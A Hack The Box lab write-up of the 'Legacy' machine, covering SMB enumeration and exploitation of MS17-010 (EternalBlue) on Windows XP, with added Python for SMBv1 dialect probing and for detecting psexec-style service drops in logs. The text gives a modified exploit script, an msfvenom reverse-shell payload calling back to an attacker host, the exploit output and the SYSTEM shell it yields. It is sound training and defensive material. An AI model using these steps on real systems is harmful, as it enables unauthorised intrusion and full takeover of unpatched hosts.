Hack The Box - Legacy Writeup

Description

I am doing this as part of my OSCP preparation. This is quite an easy box and only requires a single exploit to get root.

Enumeration

Add legacy.htb to /etc/hosts and start an nmap scan (-Pn skips the ICMP host-discovery step).

Nmap

kali@kali:~$ nmap legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 22:32 EDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds

SMB

We have SMB running on the machine (139 and 445). Do a quick check of which SMB dialects it speaks.

kali@kali:~$ nmap --script smb-protocols -p445 legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 22:52 EDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.33s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols:
|   dialects:
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds

It only offers the SMBv1 dialect (NT LM 0.12), and a host this old is very likely vulnerable to the infamous MS17-010 bug (EternalBlue), the one WannaCry spread with. Nmap's smb-vuln-ms17-010 script can confirm that before firing an exploit.
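
The smb-protocols check above works by offering the server one dialect at a time in an SMB_COM_NEGOTIATE request and reading back the DialectIndex it picks (0 for the offered dialect, 0xFFFF for "none of these"). The following Python is an added example, not code from the original writeup, that builds that request by hand, parses the reply and pulls out the signing policy from the NT LM 0.12 response; the server replies used for the offline test are constructed here and are not captures from the box. probe_dialect talks to a real host and is not exercised by the test.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
NO_DIALECT = 0xFFFF            # DialectIndex a server returns when it speaks none offered

# Dialect strings exactly as they travel on the wire. "NT LM 0.12" is the
# classic SMBv1 dialect the target in the writeup answered with.
NT_LM_012 = b"NT LM 0.12"


def smb1_header(command, flags=0x18, flags2=0x4001, mid=1):
    """32-byte SMB_Header (MS-CIFS 2.2.3.1): Protocol, Command, Status, Flags,
    Flags2, PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID."""
    return struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, mid)


def build_negotiate_request(dialects):
    """SMB_COM_NEGOTIATE request: WordCount 0, then one 0x02<dialect>0x00 entry per dialect."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(body)) + body
    # NetBIOS session service framing: message type 0x00 + 3-byte big-endian length
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def parse_negotiate_response(packet):
    """Return which offered dialect the server chose and its signing policy."""
    if packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(packet[1:4], "big")
    smb = packet[4:4 + length]
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB1 negotiate response")
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    params = smb[33:33 + 2 * word_count]
    info = {"status": status, "dialect_index": None, "accepted": False,
            "signing_enabled": None, "signing_required": None}
    if word_count == 0:
        return info                      # error reply, nothing negotiated
    info["dialect_index"] = struct.unpack_from("<H", params, 0)[0]
    info["accepted"] = info["dialect_index"] != NO_DIALECT
    if word_count == 17:                 # NT LM 0.12 response layout
        security_mode = params[2]        # bit 2: signing enabled, bit 3: signing required
        info["signing_enabled"] = bool(security_mode & 0x04)
        info["signing_required"] = bool(security_mode & 0x08)
    return info


def build_negotiate_response(dialect_index, security_mode=0x03):
    """Constructed server reply for offline testing (shaped like an SMBv1 host's):
    WordCount 17 when a dialect is chosen, WordCount 1 when none is."""
    if dialect_index == NO_DIALECT:
        words = struct.pack("<H", NO_DIALECT)
        body = b""
    else:
        # DialectIndex, SecurityMode, MaxMpxCount, MaxNumberVcs, MaxBufferSize,
        # MaxRawSize, SessionKey, Capabilities, SystemTime, ServerTimeZone, ChallengeLength
        words = struct.pack("<HBHHIIIIqhB", dialect_index, security_mode, 50, 1,
                            16644, 65536, 0, 0x0000E3FD, 0, 0, 8)
        body = b"\x00" * 8               # dummy 8-byte challenge
    smb = (smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([len(words) // 2])
           + words + struct.pack("<H", len(body)) + body)
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during negotiate")
        buf += chunk
    return buf


def probe_dialect(host, dialect=NT_LM_012, port=445, timeout=5):
    """Live check (not run offline): offer exactly one dialect. A server that
    speaks it answers DialectIndex 0; one that refuses SMBv1 answers 0xFFFF
    or simply drops the connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request([dialect]))
        head = _recv_exact(s, 4)
        return parse_negotiate_response(head + _recv_exact(s, int.from_bytes(head[1:4], "big")))
```

An accepted NT LM 0.12 with signing not required is the combination worth noting during enumeration: it is what unpatched XP and 2003 hosts present, and it is the precondition for the rest of this writeup.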

Root Shell

Exploit-DB has a manual (non-Metasploit) MS17-010 exploit script.

I will be using this script; it needs the helper module mysmb.py, which can be found here.

Let's look at the code to see what to change to get a shell.

The functions smb_pwn, smb_send_file and service_exec are the ones we need.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	print('creating file c:\\pwned.txt on the target')
	tid2 = smbConn.connectTree('C$')
	fid2 = smbConn.createFile(tid2, '/pwned.txt')
	smbConn.closeFile(tid2, fid2)
	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
	with open(localSrc, 'rb') as fp:
		smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

# based on impacket/examples/serviceinstall.py
# Note: using Windows Service to execute command same as how psexec works
def service_exec(conn, cmd):
	import random
	import string
	from impacket.dcerpc.v5 import transport, srvs, scmr
	# ... remainder of the function unchanged from the original script

Here smb_send_file writes a local file to the target through an administrative share (C$ in our case, so the path is relative to the drive root) and service_exec runs a command by creating and starting a temporary Windows service through the Service Control Manager, the same mechanism psexec uses. The note in the original script matters: a binary started this way should be a real service executable (msfvenom -f exe-service), otherwise the Service Control Manager times out waiting for it to report that it is running.

We can create a payload using msfvenom and then execute it to get a shell.

Msfvenom

kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8081 -f exe -o /home/kali/Desktop/htb/legacy/shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: /home/kali/Desktop/htb/legacy/shell.exe

Now modify the script to our needs. We don't need the first part, where the script tests writing a file.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
	#print('creating file c:\\pwned.txt on the target')
	#tid2 = smbConn.connectTree('C$')
	#fid2 = smbConn.createFile(tid2, '/pwned.txt')
	#smbConn.closeFile(tid2, fid2)
	#smbConn.disconnectTree(tid2)
	
	smb_send_file(smbConn, 'shell.exe', 'C', r'\shell.exe')  # raw string: '\s' is not a valid escape
	service_exec(conn, r'C:\shell.exe')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

Start a listener, then run the exploit.

kali@kali:~/Desktop/htb/legacy$ python ex.py legacy.htb
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81b44230
SESSION: 0xe1a85a70
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe22d4bd0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe22d4c70
overwriting token UserAndGroups
Opening SVCManager on legacy.htb.....
Creating service AraA.....
Starting service AraA.....
The NETBIOS connection with the remote host timed out.
Removing service AraA.....
ServiceExec Error on: legacy.htb
nca_s_proto_error
Done
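
The exploit run leaves a very recognisable trail on the host: a service with a four-letter random name (AraA above) is installed, started and removed, its binary lives in the root of C:\, and because shell.exe is not a service executable the start request times out. The Python below is an added example, not part of the original writeup, that applies those three indicators to a small set of constructed service-control records (made up to mirror this run, not a real capture) in a normalised "timestamp|event id|service name|image path" shape. The event IDs are assumed for the example: 7045 for a service install (logged on Vista and later), 7035 for a start control being sent, 7009 for the SCM timing out while waiting for the service to connect.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of service-control events, already normalised to
# "timestamp|event id|service name|image path". The AraA lines mirror the
# exploit run in the writeup; gupdate and Dnscache are benign controls.
SAMPLE_EVENTS = """\
2020-08-02T23:04:12|7045|gupdate|C:\\Program Files\\Google\\Update\\GoogleUpdate.exe
2020-08-02T23:04:13|7035|gupdate|
2020-08-02T23:05:10|7045|AraA|C:\\shell.exe
2020-08-02T23:05:10|7035|AraA|
2020-08-02T23:05:12|7035|Dnscache|
2020-08-02T23:05:41|7009|AraA|
"""

# impacket's serviceinstall (which the exploit reuses) names its service with
# four random ASCII letters; the dropped binary sits in the root of C$.
RANDOM_NAME = re.compile(r"^[A-Za-z]{4}$")
DRIVE_ROOT_BINARY = re.compile(r"^[A-Za-z]:\\[^\\]+\.exe$", re.IGNORECASE)


def parse_events(text):
    """Turn the pipe-separated records into (time, event_id, name, path) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, name, path = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), int(event_id), name, path))
    return events


def find_psexec_style_services(text, window=timedelta(seconds=90), min_reasons=2):
    """Flag service installs that look like a psexec-style drop-and-run.
    A single indicator is noisy on its own, so a finding needs at least
    min_reasons of them."""
    events = parse_events(text)
    findings = []
    for ts, event_id, name, path in events:
        if event_id != 7045:
            continue
        reasons = []
        if RANDOM_NAME.match(name):
            reasons.append("four-letter random-looking service name")
        if DRIVE_ROOT_BINARY.match(path):
            reasons.append("service binary dropped in a drive root")
        # Look only at this service's events inside the window after the install.
        follow_up = [e for e in events if e[2] == name and ts <= e[0] <= ts + window]
        if any(e[1] == 7009 for e in follow_up):
            reasons.append("never reported running to the SCM (7009 timeout)")
        if len(reasons) >= min_reasons:
            findings.append({"service": name, "image": path,
                             "installed": ts.isoformat(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_psexec_style_services(SAMPLE_EVENTS):
        print(f"{f['installed']} {f['service']} ({f['image']}): {', '.join(f['reasons'])}")
```

The 7009 indicator is exactly the side effect of using a plain -f exe payload; an attacker who builds with -f exe-service avoids it, which is why the two static indicators (name shape and drop location) are required as well.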

The ServiceExec error at the end is expected rather than a failure: shell.exe was built with -f exe, not -f exe-service, so once the Service Control Manager starts it the process never reports a running state and the start request times out after about 30 seconds. By then the reverse shell has already been launched, which is why a session opens at the listener. (Target OS: Windows 5.1 is Windows XP.) The multi/handler listener was started before running the exploit and catches the connection:

kali@kali:~/Desktop/htb/legacy$ msfconsole

       =[ metasploit v5.0.97-dev                          ]
+ -- --=[ 2043 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lport 8081
lport => 8081
msf5 exploit(multi/handler) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:8081
[*] Command shell session 1 opened (10.10.14.5:8081 -> 10.10.10.4:1044) at 2020-08-02 23:05:42 -0400


(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd C:\
cd C:\
C:\>cd Docu*
cd Docu*

C:\Documents and Settings>cd Admin*
cd Admin*

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  09:07     <DIR>          .
16/03/2017  09:07     <DIR>          ..
16/03/2017  09:18     <DIR>          Desktop
16/03/2017  09:07     <DIR>          Favorites
16/03/2017  09:07     <DIR>          My Documents
16/03/2017  08:20     <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.400.692.224 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec91***************

And we have the flag. On to the next one.
